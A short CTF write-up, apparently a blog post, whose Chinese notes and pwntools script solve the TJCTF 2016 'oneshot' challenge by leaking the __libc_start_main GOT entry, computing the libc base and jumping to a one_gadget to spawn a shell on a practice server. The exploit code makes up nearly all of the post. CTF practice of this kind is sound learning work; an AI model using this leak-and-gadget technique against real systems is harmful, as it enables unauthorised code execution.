oneshot_tjctf_2016

Posted by Mr.Be1ieVe on Wednesday, February 5, 2020

image-20200205020208419

image-20200205020146218

*v4,要用str(elf.got['__libc_start_main'])

接收要用int(sh.recvuntil("\n",True),16)

exp

from pwn import *
# pwntools settings: log at debug level and treat the target as x86-64.
context(log_level='debug', arch='amd64')
# The challenge binary; pwn() reads its GOT entry for __libc_start_main.
elf = ELF('./oneshot_tjctf_2016')
# Placeholders rebound inside pwn(): the libc ELF and the process/remote handle.
lib = sh = 0
def pwn(ip: str, port: int, debug: int):
    """Drive the two-prompt interaction with the target binary.

    Args:
        ip: remote host, used when ``debug`` is not 1.
        port: remote port, used when ``debug`` is not 1.
        debug: 1 runs the binary locally and loads the system libc;
            any other value connects to ``ip:port`` and loads the libc
            from the hard-coded path below.

    Side effects: rebinds the module globals ``lib`` and ``sh``, then hands
    the session to ``sh.interactive()``.
    """
    global lib
    global sh
    if debug == 1:
        sh = process('./oneshot_tjctf_2016')
        lib = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    else:
        sh = remote(ip,port)
        # NOTE(review): the symbol offset and the constant below are both
        # taken relative to this file, so it has to be the libc the target
        # actually runs with — confirm when changing targets.
        lib = ELF('/home/mrbelieve/Desktop/PWN/buu/libc/64-libc-2.23.so')
    # First input: the GOT slot address of __libc_start_main as a decimal
    # string (the note above records that str(), not raw bytes, is required).
    payload = str(elf.got['__libc_start_main'])
    pause()  # pwntools pause: waits for a keypress, e.g. to attach a debugger locally
    sh.sendline(payload)
    # The code expects the reply to carry the value after a "0x0000" prefix,
    # newline-terminated; the remainder of that line is parsed as hex.
    sh.recvuntil("0x0000")
    __libc_start_main = int(sh.recvuntil("\n",True),16)
    # Base address of the loaded libc = leaked address - symbol offset in `lib`.
    libc = __libc_start_main - lib.symbols['__libc_start_main']
    # Offset added to the libc base for the second input; presumably specific
    # to the libc build loaded above — TODO confirm if `lib` changes.
    one_gadget = 0xf1147 
    payload = str( libc  + one_gadget)
    sh.sendline(payload)

    sh.interactive()
if __name__ == "__main__":
    # debug=0 selects the remote branch in pwn(); host/port from the original writeup.
    pwn("node3.buuoj.cn", 29303, 0)
